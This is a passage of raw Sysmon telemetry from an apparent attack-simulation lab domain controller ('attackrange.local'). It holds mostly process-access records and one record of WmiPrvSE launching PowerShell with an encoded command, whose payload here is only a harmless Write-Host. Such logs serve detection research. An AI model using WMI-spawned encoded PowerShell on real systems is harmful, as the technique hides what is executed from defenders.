Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F36634FED46453C6503B9975A6D820B,SHA256=AC4B171B865D6B4D79A95DE27B8E8EA52BD032D020ECA0945E584D11BC0B03A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002242862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54CF079B75DA9843DD511CC796165C7A,SHA256=E44CF63A8C480E21F0A2E6EDC08DB94C91BCD72978247FF9F5D614F41E7CA729,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.233{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.233{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.233{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.217{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.217{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002242856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.217{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vrfw5lwr.hu2.ps12021-03-02 16:54:43.217 10341000x80000000000000002242855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.217{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.217{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.217{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002242851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.226{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedCom VwByAGkAdABlAC0ASABvAHMAdAAgADkAOQBhADcANQAwADMAMQAtAGQANAAyADgALQA0ADIANQBmAC0AYQAwAGMANAAtADkAMwBkAGQAMwBjAGMANAA5ADYANQA1AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002242850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.201{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D9AA-00000000AD01}4448C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D7AA-00000000AD01}4420C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D5AA-00000000AD01}15664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 